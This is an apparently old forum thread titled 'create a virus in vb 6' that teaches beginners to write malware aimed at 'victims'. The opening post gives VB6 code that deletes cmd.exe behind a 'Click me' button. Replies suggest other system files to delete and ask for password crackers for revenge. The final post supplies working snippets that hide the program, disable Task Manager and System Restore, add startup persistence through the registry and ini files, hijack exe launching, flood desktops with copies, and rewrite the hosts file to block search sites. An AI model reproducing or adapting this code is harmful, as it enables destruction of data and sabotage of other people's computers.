create a virus in vb 6 * BIGINNERS ONLY *

ok so u noobs out there want a fast easy effective virus in vb 6 ... well ok!!

first of all open vb and select standard exe then make..

1 button
2 labels NO TEXT
1 timer with 3000 interval

ok so now put a desired caption in the button ( Click me is a good one ;)) now in the code of the button put this

Private Sub Command1_Click()
Dim targetfile As String
targetfile = "C:WINDOWSsystem32cmd.exe"
Kill targetfile
Label1.Caption = " Deleting CMD.exe...please wait "
Timer1.Enabled = True
End Sub

now in the code for the timer put this

Private Sub Timer1_Timer()
Label2.Caption = "Done"
End Sub

and last of all do this

double in the code of the FORM type this make sure u have the activated part

Private Sub Form_Activate()
Timer1.Enabled = False

there u have it !! DO NOT PRESS THE BUTTON ( or back up ur cmd ) this is intended for your victim or u can change the dirctory to a useless file u dont need to test it .. oh yeah and 1 more thing if u dont want your victim to know then just change the form activte timer to false instead of true

good luck

Comments

• Private Sub Form_Activate()
    Timer1.Enabled = False
    end sub

forgot to put end sub ;)
  • : Private Sub Form_Activate()
    : Timer1.Enabled = False
    : end sub
    :
    :
    : forgot to put end sub ;)
    :
    Im curious... Would u know how to make a password cracker for a game called Runescape? Or maybe Yahoo Instant Messanger?

I have some serious revenge i need to get out of my system.

Thanks...
    [grey]"Those who follow the paths of others will not succeed in this world."[/grey]

• : Im curious... Would u know how to make a password cracker for a game called Runescape? Or maybe Yahoo Instant Messanger?
    :
    : I have some serious revenge i need to get out of my system.
    :
    : Thanks...
    : [grey]"Those who follow the paths of others will not succeed in this world."[/grey]
    :
    :

aint runescape free ?

• : : Private Sub Form_Activate()
    : : Timer1.Enabled = False
    : : end sub
    : :
    : : forgot to put end sub ;)
    : Im curious... Would u know how to make a password cracker for a game called Runescape? Or maybe Yahoo Instant Messanger?
    :
    : I have some serious revenge i need to get out of my system.
    :
    : Thanks...
    : [grey]"Those who follow the paths of others will not succeed in this world."[/grey]
    :
    :

Hey, I'm in for a little brute-forcing... Anyone got the protocols for yahoo messenger? And any volunteers to run the cracker on?
    EtHeO out...

• : : : Private Sub Form_Activate()
    : : : Timer1.Enabled = False
    : : : end sub
    : : :
    : : : forgot to put end sub ;)
    : : Im curious... Would u know how to make a password cracker for a game called Runescape? Or maybe Yahoo Instant Messanger?
    : : I have some serious revenge i need to get out of my system.
    : : Thanks...
    : : [grey]"Those who follow the paths of others will not succeed in this world."[/grey]
    :
    : Hey, I'm in for a little brute-forcing... Anyone got the protocols for yahoo messenger? And any volunteers to run the cracker on?
    : EtHeO out...
    :
    :

Thats kind of nice virus but one other file to delete is Autoexec.bat(starts harddrives and stuffs like that when you starts the computer), rundll32.dll(the program where you can change background and screesavers) deleting this and your computer is dead.... ;)

• : : : : Private Sub Form_Activate()
    : : : : Timer1.Enabled = False
    : : : : end sub
    : : : :
    : : : : forgot to put end sub ;)
    : : : Im curious... Would u know how to make a password cracker for a game called Runescape? Or maybe Yahoo Instant Messanger?
    : : : I have some serious revenge i need to get out of my system.
    : : : Thanks...
    : : : [grey]"Those who follow the paths of others will not succeed in this world."[/grey]
    : : Hey, I'm in for a little brute-forcing... Anyone got the protocols for yahoo messenger? And any volunteers to run the cracker on?
    : : EtHeO out...
    :
    : Thats kind of nice virus but one other file to delete is Autoexec.bat(starts harddrives and stuffs like that when you starts the computer), rundll32.dll(the program where you can change background and screesavers) deleting this and your computer is dead.... ;)
    :
    :
    Just delete cmdninst.exe, and the whol windows, no matter what version, will refuse to boot.
    EtHeO out...

• : : : : : Private Sub Form_Activate()
    : : : : : Timer1.Enabled = False
    : : : : : end sub
    : : : : :
    : : : : : forgot to put end sub ;)
    : : : : Im curious... Would u know how to make a password cracker for a game called Runescape? Or maybe Yahoo Instant Messanger?
    : : : : I have some serious revenge i need to get out of my system.
    : : : : Thanks...
    : : : : [grey]"Those who follow the paths of others will not succeed in this world."[/grey]
    : : : Hey, I'm in for a little brute-forcing... Anyone got the protocols for yahoo messenger? And any volunteers to run the cracker on?
    : : : EtHeO out...
    : : Thats kind of nice virus but one other file to delete is Autoexec.bat(starts harddrives and stuffs like that when you starts the computer), rundll32.dll(the program where you can change background and screesavers) deleting this and your computer is dead.... ;)
    : Just delete cmdninst.exe, and the whol windows, no matter what
    : version, will refuse to boot.
    : EtHeO out...
    :
    :

EtHeo i cant find this cmdninst.exe in xp anyone know how to crash xp?
  • : : : : : : Private Sub Form_Activate()
    : : : : : : Timer1.Enabled = False
    : : : : : : end sub
    : : : : : :
    : : : : : : forgot to put end sub ;)
    : : : : : Im curious... Would u know how to make a password cracker for a game called Runescape? Or maybe Yahoo Instant Messanger?
    : : : : : I have some serious revenge i need to get out of my system.
    : : : : : Thanks...
    : : : : : [grey]"Those who follow the paths of others will not succeed in this world."[/grey]
    : : : : Hey, I'm in for a little brute-forcing... Anyone got the protocols for yahoo messenger? And any volunteers to run the cracker on?
    : : : : EtHeO out...
    : : : Thats kind of nice virus but one other file to delete is Autoexec.bat(starts harddrives and stuffs like that when you starts the computer), rundll32.dll(the program where you can change background and screesavers) deleting this and your computer is dead.... ;)
    : : Just delete cmdninst.exe, and the whol windows, no matter what
    : : version, will refuse to boot.
    : : EtHeO out...
    :
    : EtHeo i cant find this cmdninst.exe in xp anyone know how to crash
    : xp?
    :
    thanks a lot for the "kill" commands
    i just created my first virus in vb.
    It doesnt really destroy files per-se
    it just opens up random-ass iexplorer-webpages on a regular basis.
    i used the "kill" command to destroy taskmgr.exe, which is very helpfull.
    to all those who wanna make viruses and hack things, learn a basic programming language like VB or C++, and do maths.

• Ok how about something a little more substantial, yes noobies must take it slow to get the basics right but! that does not mean they cant learn what makes a virus effective.

Ok 1st let's start with a basic code to keep your virus/worm/trojan hidden from the victim who has received your program and has executed it.

[code]Private Sub Form_Load()
    On Error Resume Next
    'This command will allow the application to continue running
    'even if an error occurs instead of terminating/closing.
    Hide
    'This command will hide the application from even being seen on the victims
    'screen even if your program has it's settings set to Visible|True
    App.TaskVisible = False
    'This command is even better, this command will stop your program
    'from showing up in Task Manager-Applications Tab List, but it will still
    'show up in process list, sorry =/
    End Sub[/code]
    Ok now let's move on to some fun, here are some scripts i like to use
    hope they help you, they're simple but they do the job.
    Disable TaskManager
    [code]Shell "REG add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f", vbHide
    [/code]
    By using Shell, u can use any single CMD command, and by adding
    ,vbHide after it, CMD will not appear and the victim will not be aware that anything has happened.

Here is a phew more commands for Shell using VB 6.0 Pro:
    [code]Shell "REG add HKCUSoftwareMicrosoftWindowsCurrentVersionRun /v ###Name### /t REG_SZ /d ###Drive:PathName.exe### /f", vbHide
    'This command will make your application start with windows.[/code]
    [code]Shell "REG add HKCRexefileshellopencommand /v Shell /t REG_SZ /d ###Drive:PathName.exe### %1 %* /f", vbHide
    'This command will make your application start when ever the victim opens another application via msnmsngr.exe as an example.[/code]
    [code]Shell "REG add HKLMControl PanelInternational /v s1159 /t REG_S /d ###Letter/Symbol/Number### /f", vbHide
    Shell "REG add HKLMControl PanelInternational /v s2359 /t REG_SZ /d ###Letter/Symbol/Number### /f", vbHide
    Shell "REG add HKLMControl PanelInternational /v SLongDate /t REG_SZ /d ###Letter/Symbol/Number### /f", vbHide
    Shell "REG add HKLMControl PanelInternational /v sShortDate /t REG_SZ /d ###Letter/Symbol/Number### /f", vbHide
    Shell "REG add HKLMControl PanelInternational /v sTimeFormat /t REG_SZ /d ###Letter/Symbol/Number### /f", vbHide
    Shell "REG add HKLMControl PanelInternational /v sNativeDigits /t REG_SZ /d ###Letter/Symbol/Number### /f", vbHide
    'These commands will set the time & date for the victims computer permanently
    'Change the ###Letter/Symbol/Number### to ? for example, and the victim will see ???????? for the time and ??????
    'for the date.[/code]
    [code]FileCopy App.Path & "" & App.EXEName & ".EXE", "Drive:PathName.exe"
    'This code well, it couldn't be more obvious what it does, but when copying your virus/worm ect
    'to a new path, try looking up windows processes like svchost.exe, making it harder for the victim
    'to get rid of your virus/worm/trojan ect.
    [/code]
    [code]Dim intResult As Integer
    Randomize
    intResult = Int((9542 * Rnd) + 4592)
    FileCopy App.Path & "" & App.EXEName & ".EXE", "c:Documents and SettingsAll UsersDesktopDimenBlackScript.exe" & intResult & ".exe"
    'Ok for abit of fun, here is a simple code but a real nasty one, add a timer to your application
    'interval set to "1" when this code runs, all user accounts desktops will be flooded with your virus and the longer it
    'runs the more Memory it takes up and the more viruses that person has to delete, try adding it to places like
    ' C:DOCU~All UsersStart MenuProgramsStart up
    'That will cause the victim alot of hassle =P.[/code]
    [code]Kill "c:windowswin.ini"
    Kill "c:windowssystem.ini"
    Open "c:WINDOWSwin.ini" For Output As #1
    Print #1, "Load = C:Program FilesVirus1.exe"
    Print #1, "run = C:Program FilesVirus2.exe"
    Close #1
    Open "c:WINDOWSsystem.ini" For Output As #1
    Print #1, "Shell=Explorer.exe C:WINDOWSSystemVirus3.exe"
    Print #1, "Shell=Explorer.exe C:WINDOWSSystem32Virus4.exe"
    Close #1
    'Ok people more fun, making your application start with windows, without using Registry or DOS
    'one little alter and your viruses and start with windows and the victim will not know how.[/code]
    [code]Open "c:WINDOWSsystem32driversetchosts" For Output As #1
    Print #1, "208.65.153.251 208.65.153.251 "
    Print #1, "208.65.153.251 www.google.com"
    Print #1, "208.65.153.251 www.google.co.uk"
    Print #1, "208.65.153.251 www.yahoo.com"
    Print #1, "208.65.153.251 www.yahoo.co.uk"
    Print #1, "208.65.153.251 www.askjeeves.com"
    Print #1, "208.65.153.251 www.altavista.com"
    Print #1, "208.65.153.251 www.alltheweb.com"
    Print #1, "208.65.153.251 www.msn.com"
    Print #1, "208.65.153.251 www.hotmail.com"
    Print #1, "208.65.153.251 www.myspace.com"
    Print #1, "208.65.153.251 www.plunder.com"
    Print #1, "208.65.153.251 www.quicksharing.com"
    Print #1, "208.65.153.251 www.myspace.co.uk"
    Close #1
    'Just something to help stop the victim from google-ing what the virus has done, and getting information
    'or downloads to help rid them of your infection >=P.[/code]
    [code]Kill "%SystemRoot%syst" & "em32dfrg.msc"
    Kill "%SystemRoot%syste" & "m32wscui.cpl"
    Kill "C:Program FilesCo" & "mmon FilesMicrosoft SharedMSInfomsinfo32.exe"
    Kill "%SystemRoot%syste" & "m32
    estore
    strui.exe"
    Kill "c:WINDOWSsyste" & "m32
    undll32.exe"
    'Ok now finally let's get rid of System Restore, Rundll(by deleting this file, the victim can no longer
    'view the properties window for any file on his or her computer).
    [/code]
    Ok people that's about it, if you want more well, i have a website but it's still under maintenance at:
    www.dimen.co.nr - www.dimen.vnvd.com/Index.html & also a little fun website, www.cspy.co.nr also
    part of the first website. have fun people, and don't sit here reading this and copy all the codes, try making your
    own from these, you will be amazed at what i learned over the past year and a half.

Peace